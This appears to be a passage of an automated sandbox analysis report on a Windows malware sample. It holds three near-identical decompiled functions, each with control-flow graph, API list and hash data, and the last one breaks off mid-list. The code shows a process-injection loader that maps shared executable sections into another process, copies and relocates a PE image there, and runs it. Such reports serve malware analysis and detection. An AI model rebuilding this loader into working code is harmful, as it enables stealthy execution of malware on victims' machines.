                      • Opcode Fuzzy Hash: 6e59b7e5303ef17d3f4c775c21a888ce17b01420e14e5236be6b7b92dd2dae58
                      • Instruction Fuzzy Hash: 29512971900245BFEB219F91CC49FEF7BB9EF85B00F10412AFA11AA2A5D7709941CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 240 4014bf-4014c4 244 4014db 240->244 245 4014cc-4014f1 call 40119e 240->245 244->245 249 4014f3 245->249 250 4014f6-4014fb 245->250 249->250 252 401501-401512 250->252 253 401824-40182c 250->253 256 401822 252->256 257 401518-401541 252->257 253->250 258 401831-401842 253->258 256->258 257->256 267 401547-40155e NtDuplicateObject 257->267 261 401845-401866 call 40119e 258->261 262 401838-40183e 258->262 262->261 267->256 269 401564-401588 NtCreateSection 267->269 271 4015e4-40160a NtCreateSection 269->271 272 40158a-4015ab NtMapViewOfSection 269->272 271->256 275 401610-401614 271->275 272->271 274 4015ad-4015c9 NtMapViewOfSection 272->274 274->271 277 4015cb-4015e1 274->277 275->256 276 40161a-40163b NtMapViewOfSection 275->276 276->256 278 401641-40165d NtMapViewOfSection 276->278 277->271 278->256 279 401663 call 401668 278->279
                      C-Code - Quality: 62%
                      			E004014BF(void* __ebx, void* __edi, void* __eflags) {
                      				void* _t84;
                      				intOrPtr _t87;
                      				long _t90;
                      				void* _t91;
                      				struct _GUID _t98;
                      				struct _GUID _t100;
                      				PVOID* _t102;
                      				PVOID* _t104;
                      				intOrPtr _t106;
                      				intOrPtr* _t108;
                      				PVOID* _t121;
                      				PVOID* _t123;
                      				intOrPtr _t128;
                      				intOrPtr _t130;
                      				intOrPtr _t131;
                      				long* _t132;
                      				signed int _t139;
                      				int _t140;
                      				signed int _t159;
                      				signed int _t160;
                      				signed int _t161;
                      				void* _t162;
                      				intOrPtr* _t163;
                      				void* _t166;
                      				long _t174;
                      				intOrPtr _t176;
                      				void* _t177;
                      				long* _t183;
                      				intOrPtr* _t185;
                      				HANDLE* _t186;
                      				HANDLE* _t187;
                      				void* _t192;
                      				void* _t193;
                      				intOrPtr* _t196;
                      				void* _t197;
                      				void* _t200;
                      				void* _t201;
                      				intOrPtr* _t203;
                      				intOrPtr* _t204;
                      				void* _t207;
                      				intOrPtr* _t208;
                      				void* _t209;
                      				long _t224;
                      
                      				asm("invalid");
                      				_t84 = 0x14e3;
                      				_push(0x37f);
                      				_t130 =  *_t203;
                      				_t204 = _t203 + 4;
                      				L0040119E(_t84, _t130, __edi, __eflags);
                      				_t128 =  *((intOrPtr*)(_t201 + 8));
                      				_t174 = 0;
                      				 *((intOrPtr*)(_t201 - 0x34)) = 0;
                      				if(gs != 0) {
                      					 *((intOrPtr*)(_t201 - 0x34)) =  *((intOrPtr*)(_t201 - 0x34)) + 1;
                      				}
                      				while(1) {
                      					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
                      					if(_t87 != 0) {
                      						break;
                      					}
                      					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                      				}
                      				 *((intOrPtr*)(_t201 - 0x5c)) = _t87;
                      				_t183 = _t201 - 0x60;
                      				 *_t183 = _t174;
                      				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t183);
                      				_t90 =  *_t183;
                      				if(_t90 != 0) {
                      					_t132 = _t201 - 0x30;
                      					 *_t132 = _t90;
                      					_t132[1] = _t174;
                      					_t185 = _t201 - 0x28;
                      					 *((intOrPtr*)(_t128 + 0x10))(_t185, 0x18);
                      					 *_t185 = 0x18;
                      					_push(_t201 - 0x30);
                      					_push(_t185);
                      					_push(0x40);
                      					_push(_t201 - 0x10);
                      					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t201 - 0x10), 0xffffffff, 0xffffffff, _t201 - 0xc, _t174, _t174, 2) == 0) {
                      						 *(_t201 - 8) = _t174;
                      						_t98 = _t201 - 0x50;
                      						 *(_t98 + 4) = _t174;
                      						 *_t98 = 0x5000;
                      						_t186 = _t201 - 0x54;
                      						if(NtCreateSection(_t186, 6, _t174, _t98, 4, 0x8000000, _t174) == 0) {
                      							 *_t25 =  *(_t201 - 0x50);
                      							_t121 = _t201 - 0x44;
                      							 *_t121 = _t174;
                      							if(NtMapViewOfSection( *_t186, 0xffffffff, _t121, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
                      								_t123 = _t201 - 0x3c;
                      								 *_t123 = _t174;
                      								if(NtMapViewOfSection( *_t186,  *(_t201 - 0xc), _t123, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
                      									_t200 =  *(_t201 - 0x44);
                      									 *((intOrPtr*)(_t128 + 0x20))(_t174, _t200, 0x104);
                      									 *((intOrPtr*)(_t200 + 0x208)) =  *((intOrPtr*)(_t201 + 0x14));
                      									 *(_t201 - 8) =  *(_t201 - 8) + 1;
                      								}
                      							}
                      						}
                      						_t100 = _t201 - 0x50;
                      						 *(_t100 + 4) = _t174;
                      						 *_t100 =  *((intOrPtr*)(_t201 + 0x10)) + 0x10000;
                      						_t187 = _t201 - 0x58;
                      						if(NtCreateSection(_t187, 0xe, _t174, _t100, 0x40, 0x8000000, _t174) == 0 &&  *(_t201 - 8) != 0) {
                      							 *_t46 =  *(_t201 - 0x50);
                      							_t102 = _t201 - 0x48;
                      							 *_t102 = _t174;
                      							if(NtMapViewOfSection( *_t187, 0xffffffff, _t102, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
                      								_t104 = _t201 - 0x40;
                      								 *_t104 = _t174;
                      								_t224 = NtMapViewOfSection( *_t187,  *(_t201 - 0xc), _t104, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 0x20);
                      								if(_t224 == 0) {
                      									L21();
                      									if(_t224 == 0 && _t224 != 0) {
                      									}
                      									_t207 = _t204 + 4;
                      									_push(0x2e62);
                      									_t208 = _t207 + 4;
                      									_push(0x2260);
                      									_t106 =  *_t208;
                      									_t209 = _t208 + 4;
                      									_t159 = (0x2260 << 5) + _t106;
                      									asm("lodsb");
                      									_t160 = _t159;
                      									asm("loop 0xffffffc2");
                      									_t161 = _t160 ^ 0xbcc951dd;
                      									_t204 = _t209 - _t161;
                      									_t192 =  *((intOrPtr*)(_t201 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xc))));
                      									_t139 =  *(_t192 + 6) & 0x0000ffff;
                      									_push(_t192);
                      									_t162 = _t192;
                      									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                      										_t163 = _t162 + 0xf8;
                      										__eflags = _t163;
                      									} else {
                      										_t163 = _t162 + 0x108;
                      									}
                      									_push(_t139);
                      									_t140 =  *(_t163 + 0x10);
                      									if(_t140 != 0) {
                      										memcpy( *((intOrPtr*)(_t163 + 0xc)) +  *(_t201 - 0x48),  *((intOrPtr*)(_t163 + 0x14)) +  *((intOrPtr*)(_t201 + 0xc)), _t140);
                      										_t204 = _t204 + 0xc;
                      									}
                      									asm("loop 0xffffffe6");
                      									_pop(_t193);
                      									_t229 =  *((intOrPtr*)(_t201 - 0x34));
                      									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                      										_push(_t193);
                      										_t166 =  *((intOrPtr*)(_t193 + 0x34)) -  *(_t201 - 0x40);
                      										_t196 =  *((intOrPtr*)(_t193 + 0xa0)) +  *(_t201 - 0x48);
                      										__eflags = _t196;
                      										while(1) {
                      											__eflags =  *_t196;
                      											if( *_t196 == 0) {
                      												break;
                      											}
                      											_t176 =  *_t196;
                      											_t196 = _t196 + 8;
                      											asm("lodsw");
                      											__eflags = 0;
                      											if(0 != 0) {
                      												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t166;
                      												__eflags =  *((intOrPtr*)(0 +  *(_t201 - 0x48) + _t176));
                      											}
                      											asm("loop 0xffffffe9");
                      										}
                      										_pop(_t197);
                      										_t174 = 0;
                      										__eflags = 0;
                      										_t108 = _t201 - 4;
                      										 *_t108 = 0;
                      										 *((intOrPtr*)(_t128 + 0x98))( *(_t201 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t197 + 0x28)) +  *(_t201 - 0x40),  *(_t201 - 0x3c), _t108, 0);
                      									} else {
                      										L54();
                      										_pop(_t177);
                      										_t174 = _t177 - 0x1760;
                      										 *((intOrPtr*)(_t174 + 0x1794)) = _t174 + 0x2c17;
                      										L00401227(_t128, _t174, _t229, _t174 + 0x2c17, 0x1ad);
                      										0x33();
                      										 *((intOrPtr*)(_t174 + 0x17b9)) = _t174 + 0x2c67;
                      										0x33();
                      									}
                      								}
                      							}
                      						}
                      					}
                      				}
                      				_t91 = 0x14e3;
                      				_push(0x37f);
                      				_t131 =  *_t204;
                      				return L0040119E(_t91, _t131, _t174, _t229);
                      			}

                      APIs
                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                      • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                      • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: Section$View$Create$DuplicateObject
                      • String ID:
                      • API String ID: 1546783058-0
                      • Opcode ID: d6868da5ad0cc6704b0b456fa49984c9b80f10e5cd5d9e7629ddc67eaa61c955
                      • Instruction ID: 07d304ea65bb56911e0060c1c25482d61d12f4ba10f26ae25195bb01424c625b
                      • Opcode Fuzzy Hash: d6868da5ad0cc6704b0b456fa49984c9b80f10e5cd5d9e7629ddc67eaa61c955
                      • Instruction Fuzzy Hash: 345106B1900245BFEB219F91CC48FEBBBB9EF85B10F104129FA11AA2E5D7749941CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 282 4014da-4014f1 call 40119e 288 4014f3 282->288 289 4014f6-4014fb 282->289 288->289 291 401501-401512 289->291 292 401824-40182c 289->292 295 401822 291->295 296 401518-401541 291->296 292->289 297 401831-401842 292->297 295->297 296->295 306 401547-40155e NtDuplicateObject 296->306 300 401845-401866 call 40119e 297->300 301 401838-40183e 297->301 301->300 306->295 308 401564-401588 NtCreateSection 306->308 310 4015e4-40160a NtCreateSection 308->310 311 40158a-4015ab NtMapViewOfSection 308->311 310->295 314 401610-401614 310->314 311->310 313 4015ad-4015c9 NtMapViewOfSection 311->313 313->310 316 4015cb-4015e1 313->316 314->295 315 40161a-40163b NtMapViewOfSection 314->315 315->295 317 401641-40165d NtMapViewOfSection 315->317 316->310 317->295 318 401663 call 401668 317->318
                      C-Code - Quality: 62%
                      			E004014DA(void* __ebx, void* __edi, void* __eflags) {
                      				void* _t84;
                      				intOrPtr _t87;
                      				long _t90;
                      				void* _t91;
                      				struct _GUID _t98;
                      				struct _GUID _t100;
                      				PVOID* _t102;
                      				PVOID* _t104;
                      				intOrPtr _t106;
                      				intOrPtr* _t108;
                      				PVOID* _t121;
                      				PVOID* _t123;
                      				intOrPtr _t128;
                      				intOrPtr _t130;
                      				intOrPtr _t131;
                      				long* _t132;
                      				signed int _t139;
                      				int _t140;
                      				signed int _t159;
                      				signed int _t160;
                      				signed int _t161;
                      				void* _t162;
                      				intOrPtr* _t163;
                      				void* _t166;
                      				long _t174;
                      				intOrPtr _t176;
                      				void* _t177;
                      				long* _t183;
                      				intOrPtr* _t185;
                      				HANDLE* _t186;
                      				HANDLE* _t187;
                      				void* _t192;
                      				void* _t193;
                      				intOrPtr* _t196;
                      				void* _t197;
                      				void* _t200;
                      				void* _t201;
                      				intOrPtr* _t203;
                      				intOrPtr* _t204;
                      				void* _t207;
                      				intOrPtr* _t208;
                      				void* _t209;
                      				long _t224;
                      
                      				_pop(_t84);
                      				_push(0x37f);
                      				_t130 =  *_t203;
                      				_t204 = _t203 + 4;
                      				L0040119E(_t84, _t130, __edi, __eflags);
                      				_t128 =  *((intOrPtr*)(_t201 + 8));
                      				_t174 = 0;
                      				 *((intOrPtr*)(_t201 - 0x34)) = 0;
                      				if(gs != 0) {
                      					 *((intOrPtr*)(_t201 - 0x34)) =  *((intOrPtr*)(_t201 - 0x34)) + 1;
                      				}
                      				while(1) {
                      					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
                      					if(_t87 != 0) {
                      						break;
                      					}
                      					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                      				}
                      				 *((intOrPtr*)(_t201 - 0x5c)) = _t87;
                      				_t183 = _t201 - 0x60;
                      				 *_t183 = _t174;
                      				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t183);
                      				_t90 =  *_t183;
                      				if(_t90 != 0) {
                      					_t132 = _t201 - 0x30;
                      					 *_t132 = _t90;
                      					_t132[1] = _t174;
                      					_t185 = _t201 - 0x28;
                      					 *((intOrPtr*)(_t128 + 0x10))(_t185, 0x18);
                      					 *_t185 = 0x18;
                      					_push(_t201 - 0x30);
                      					_push(_t185);
                      					_push(0x40);
                      					_push(_t201 - 0x10);
                      					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t201 - 0x10), 0xffffffff, 0xffffffff, _t201 - 0xc, _t174, _t174, 2) == 0) {
                      						 *(_t201 - 8) = _t174;
                      						_t98 = _t201 - 0x50;
                      						 *(_t98 + 4) = _t174;
                      						 *_t98 = 0x5000;
                      						_t186 = _t201 - 0x54;
                      						if(NtCreateSection(_t186, 6, _t174, _t98, 4, 0x8000000, _t174) == 0) {
                      							 *_t25 =  *(_t201 - 0x50);
                      							_t121 = _t201 - 0x44;
                      							 *_t121 = _t174;
                      							if(NtMapViewOfSection( *_t186, 0xffffffff, _t121, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
                      								_t123 = _t201 - 0x3c;
                      								 *_t123 = _t174;
                      								if(NtMapViewOfSection( *_t186,  *(_t201 - 0xc), _t123, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
                      									_t200 =  *(_t201 - 0x44);
                      									 *((intOrPtr*)(_t128 + 0x20))(_t174, _t200, 0x104);
                      									 *((intOrPtr*)(_t200 + 0x208)) =  *((intOrPtr*)(_t201 + 0x14));
                      									 *(_t201 - 8) =  *(_t201 - 8) + 1;
                      								}
                      							}
                      						}
                      						_t100 = _t201 - 0x50;
                      						 *(_t100 + 4) = _t174;
                      						 *_t100 =  *((intOrPtr*)(_t201 + 0x10)) + 0x10000;
                      						_t187 = _t201 - 0x58;
                      						if(NtCreateSection(_t187, 0xe, _t174, _t100, 0x40, 0x8000000, _t174) == 0 &&  *(_t201 - 8) != 0) {
                      							 *_t46 =  *(_t201 - 0x50);
                      							_t102 = _t201 - 0x48;
                      							 *_t102 = _t174;
                      							if(NtMapViewOfSection( *_t187, 0xffffffff, _t102, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
                      								_t104 = _t201 - 0x40;
                      								 *_t104 = _t174;
                      								_t224 = NtMapViewOfSection( *_t187,  *(_t201 - 0xc), _t104, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 0x20);
                      								if(_t224 == 0) {
                      									L18();
                      									if(_t224 == 0 && _t224 != 0) {
                      									}
                      									_t207 = _t204 + 4;
                      									_push(0x2e62);
                      									_t208 = _t207 + 4;
                      									_push(0x2260);
                      									_t106 =  *_t208;
                      									_t209 = _t208 + 4;
                      									_t159 = (0x2260 << 5) + _t106;
                      									asm("lodsb");
                      									_t160 = _t159;
                      									asm("loop 0xffffffc2");
                      									_t161 = _t160 ^ 0xbcc951dd;
                      									_t204 = _t209 - _t161;
                      									_t192 =  *((intOrPtr*)(_t201 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xc))));
                      									_t139 =  *(_t192 + 6) & 0x0000ffff;
                      									_push(_t192);
                      									_t162 = _t192;
                      									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                      										_t163 = _t162 + 0xf8;
                      										__eflags = _t163;
                      									} else {
                      										_t163 = _t162 + 0x108;
                      									}
                      									_push(_t139);
                      									_t140 =  *(_t163 + 0x10);
                      									if(_t140 != 0) {
                      										memcpy( *((intOrPtr*)(_t163 + 0xc)) +  *(_t201 - 0x48),  *((intOrPtr*)(_t163 + 0x14)) +  *((intOrPtr*)(_t201 + 0xc)), _t140);
                      										_t204 = _t204 + 0xc;
                      									}
                      									asm("loop 0xffffffe6");
                      									_pop(_t193);
                      									_t229 =  *((intOrPtr*)(_t201 - 0x34));
                      									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                      										_push(_t193);
                      										_t166 =  *((intOrPtr*)(_t193 + 0x34)) -  *(_t201 - 0x40);
                      										_t196 =  *((intOrPtr*)(_t193 + 0xa0)) +  *(_t201 - 0x48);
                      										__eflags = _t196;
                      										while(1) {
                      											__eflags =  *_t196;
                      											if( *_t196 == 0) {
                      												break;
                      											}
                      											_t176 =  *_t196;
                      											_t196 = _t196 + 8;
                      											asm("lodsw");
                      											__eflags = 0;
                      											if(0 != 0) {
                      												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t166;
                      												__eflags =  *((intOrPtr*)(0 +  *(_t201 - 0x48) + _t176));
                      											}
                      											asm("loop 0xffffffe9");
                      										}
                      										_pop(_t197);
                      										_t174 = 0;
                      										__eflags = 0;
                      										_t108 = _t201 - 4;
                      										 *_t108 = 0;
                      										 *((intOrPtr*)(_t128 + 0x98))( *(_t201 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t197 + 0x28)) +  *(_t201 - 0x40),  *(_t201 - 0x3c), _t108, 0);
                      									} else {
                      										L51();
                      										_pop(_t177);
                      										_t174 = _t177 - 0x1760;
                      										 *((intOrPtr*)(_t174 + 0x1794)) = _t174 + 0x2c17;
                      										L00401227(_t128, _t174, _t229, _t174 + 0x2c17, 0x1ad);
                      										0x33();
                      										 *((intOrPtr*)(_t174 + 0x17b9)) = _t174 + 0x2c67;
                      										0x33();
                      									}
                      								}
                      							}
                      						}
                      					}
                      				}
                      				_t91 = 0x14e3;
                      				_push(0x37f);
                      				_t131 =  *_t204;
                      				return L0040119E(_t91, _t131, _t174, _t229);
                      			}

                      APIs
                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                      • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                      • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: Section$View$Create$DuplicateObject
                      • String ID:
                      • API String ID: 1546783058-0
                      • Opcode ID: 1846bf87db7033a62c75dde9dc562bd107ea8d68f2b408ae9b5850e6d891a0cc
                      • Instruction ID: fcafa90473e3bce6dbc0f334a66e4de9b25c1110b2005182b8d4e3deb893a7aa
                      • Opcode Fuzzy Hash: 1846bf87db7033a62c75dde9dc562bd107ea8d68f2b408ae9b5850e6d891a0cc
                      • Instruction Fuzzy Hash: 515107B1900245BFEB219F91CC48FEFBBB9EF85B10F104129FA11AA2A5D7709945CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 321 4014dd-4014f1 call 40119e 325 4014f3 321->325 326 4014f6-4014fb 321->326 325->326 328 401501-401512 326->328 329 401824-40182c 326->329 332 401822 328->332 333 401518-401541 328->333 329->326 334 401831-401842 329->334 332->334 333->332 343 401547-40155e NtDuplicateObject 333->343 337 401845-401866 call 40119e 334->337 338 401838-40183e 334->338 338->337 343->332 345 401564-401588 NtCreateSection 343->345 347 4015e4-40160a NtCreateSection 345->347 348 40158a-4015ab NtMapViewOfSection 345->348 347->332 351 401610-401614 347->351 348->347 350 4015ad-4015c9 NtMapViewOfSection 348->350 350->347 353 4015cb-4015e1 350->353 351->332 352 40161a-40163b NtMapViewOfSection 351->352 352->332 354 401641-40165d NtMapViewOfSection 352->354 353->347 354->332 355 401663 call 401668 354->355
                      C-Code - Quality: 63%
                      			E004014DD(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
                      				void* _t84;
                      				intOrPtr _t87;
                      				long _t90;
                      				void* _t91;
                      				struct _GUID _t98;
                      				struct _GUID _t100;
                      				PVOID* _t102;
                      				PVOID* _t104;
                      				intOrPtr _t106;
                      				intOrPtr* _t108;
                      				PVOID* _t121;
                      				PVOID* _t123;
                      				intOrPtr _t128;
                      				intOrPtr _t131;
                      				long* _t132;
                      				signed int _t139;
                      				int _t140;
                      				signed int _t160;
                      				signed int _t161;
                      				signed int _t162;
                      				void* _t163;
                      				intOrPtr* _t164;
                      				void* _t167;
                      				long _t175;
                      				intOrPtr _t177;
                      				void* _t178;
                      				long* _t184;
                      				intOrPtr* _t186;
                      				HANDLE* _t187;
                      				HANDLE* _t188;
                      				void* _t193;
                      				void* _t194;
                      				intOrPtr* _t197;
                      				void* _t198;
                      				void* _t201;
                      				void* _t202;
                      				intOrPtr* _t204;
                      				void* _t207;
                      				intOrPtr* _t208;
                      				void* _t209;
                      				long _t224;
                      
                      				L0040119E(_t84, __ecx, __edi, __eflags);
                      				_t128 =  *((intOrPtr*)(_t202 + 8));
                      				_t175 = 0;
                      				 *((intOrPtr*)(_t202 - 0x34)) = 0;
                      				if(gs != 0) {
                      					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
                      				}
                      				while(1) {
                      					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
                      					if(_t87 != 0) {
                      						break;
                      					}
                      					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                      				}
                      				 *((intOrPtr*)(_t202 - 0x5c)) = _t87;
                      				_t184 = _t202 - 0x60;
                      				 *_t184 = _t175;
                      				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t184);
                      				_t90 =  *_t184;
                      				if(_t90 != 0) {
                      					_t132 = _t202 - 0x30;
                      					 *_t132 = _t90;
                      					_t132[1] = _t175;
                      					_t186 = _t202 - 0x28;
                      					 *((intOrPtr*)(_t128 + 0x10))(_t186, 0x18);
                      					 *_t186 = 0x18;
                      					_push(_t202 - 0x30);
                      					_push(_t186);
                      					_push(0x40);
                      					_push(_t202 - 0x10);
                      					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, _t175, _t175, 2) == 0) {
                      						 *(_t202 - 8) = _t175;
                      						_t98 = _t202 - 0x50;
                      						 *(_t98 + 4) = _t175;
                      						 *_t98 = 0x5000;
                      						_t187 = _t202 - 0x54;
                      						if(NtCreateSection(_t187, 6, _t175, _t98, 4, 0x8000000, _t175) == 0) {
                      							 *_t25 =  *(_t202 - 0x50);
                      							_t121 = _t202 - 0x44;
                      							 *_t121 = _t175;
                      							if(NtMapViewOfSection( *_t187, 0xffffffff, _t121, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 4) == 0) {
                      								_t123 = _t202 - 0x3c;
                      								 *_t123 = _t175;
                      								if(NtMapViewOfSection( *_t187,  *(_t202 - 0xc), _t123, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 4) == 0) {
                      									_t201 =  *(_t202 - 0x44);
                      									 *((intOrPtr*)(_t128 + 0x20))(_t175, _t201, 0x104);
                      									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
                      									 *(_t202 - 8) =  *(_t202 - 8) + 1;
                      								}
                      							}
                      						}
                      						_t100 = _t202 - 0x50;
                      						 *(_t100 + 4) = _t175;
                      						 *_t100 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
                      						_t188 = _t202 - 0x58;
                      						if(NtCreateSection(_t188, 0xe, _t175, _t100, 0x40, 0x8000000, _t175) == 0 &&  *(_t202 - 8) != 0) {
                      							 *_t46 =  *(_t202 - 0x50);
                      							_t102 = _t202 - 0x48;
                      							 *_t102 = _t175;
                      							if(NtMapViewOfSection( *_t188, 0xffffffff, _t102, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 4) == 0) {
                      								_t104 = _t202 - 0x40;
                      								 *_t104 = _t175;
                      								_t224 = NtMapViewOfSection( *_t188,  *(_t202 - 0xc), _t104, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 0x20);
                      								if(_t224 == 0) {
                      									L16();
                      									if(_t224 == 0 && _t224 != 0) {
                      									}
                      									_t207 = _t204 + 4;
                      									_push(0x2e62);
                      									_t208 = _t207 + 4;
                      									_push(0x2260);
                      									_t106 =  *_t208;
                      									_t209 = _t208 + 4;
                      									_t160 = (0x2260 << 5) + _t106;
                      									asm("lodsb");
                      									_t161 = _t160;
                      									asm("loop 0xffffffc2");
                      									_t162 = _t161 ^ 0xbcc951dd;
                      									_t204 = _t209 - _t162;
                      									_t193 =  *((intOrPtr*)(_t202 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xc))));
                      									_t139 =  *(_t193 + 6) & 0x0000ffff;
                      									_push(_t193);
                      									_t163 = _t193;
                      									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                      										_t164 = _t163 + 0xf8;
                      										__eflags = _t164;
                      									} else {
                      										_t164 = _t163 + 0x108;
                      									}
                      									_push(_t139);
                      									_t140 =  *(_t164 + 0x10);
                      									if(_t140 != 0) {
                      										memcpy( *((intOrPtr*)(_t164 + 0xc)) +  *(_t202 - 0x48),  *((intOrPtr*)(_t164 + 0x14)) +  *((intOrPtr*)(_t202 + 0xc)), _t140);
                      										_t204 = _t204 + 0xc;
                      									}
                      									asm("loop 0xffffffe6");
                      									_pop(_t194);
                      									_t229 =  *((intOrPtr*)(_t202 - 0x34));
                      									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                      										_push(_t194);
                      										_t167 =  *((intOrPtr*)(_t194 + 0x34)) -  *(_t202 - 0x40);
                      										_t197 =  *((intOrPtr*)(_t194 + 0xa0)) +  *(_t202 - 0x48);
                      										__eflags = _t197;
                      										while(1) {
                      											__eflags =  *_t197;
                      											if( *_t197 == 0) {
                      												break;
                      											}
                      											_t177 =  *_t197;
                      											_t197 = _t197 + 8;
                      											asm("lodsw");
                      											__eflags = 0;
                      											if(0 != 0) {
                      												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t167;
                      												__eflags =  *((intOrPtr*)(0 +  *(_t202 - 0x48) + _t177));
                      											}
                      											asm("loop 0xffffffe9");
                      										}
                      										_pop(_t198);
                      										_t175 = 0;
                      										__eflags = 0;
                      										_t108 = _t202 - 4;
                      										 *_t108 = 0;
                      										 *((intOrPtr*)(_t128 + 0x98))( *(_t202 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t198 + 0x28)) +  *(_t202 - 0x40),  *(_t202 - 0x3c), _t108, 0);
                      									} else {
                      										L49();
                      										_pop(_t178);
                      										_t175 = _t178 - 0x1760;
                      										 *((intOrPtr*)(_t175 + 0x1794)) = _t175 + 0x2c17;
                      										L00401227(_t128, _t175, _t229, _t175 + 0x2c17, 0x1ad);
                      										0x33();
                      										 *((intOrPtr*)(_t175 + 0x17b9)) = _t175 + 0x2c67;
                      										0x33();
                      									}
                      								}
                      							}
                      						}
                      					}
                      				}
                      				_t91 = 0x14e3;
                      				_push(0x37f);
                      				_t131 =  *_t204;
                      				return L0040119E(_t91, _t131, _t175, _t229);
                      			}

                      APIs
                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                      • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                      • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
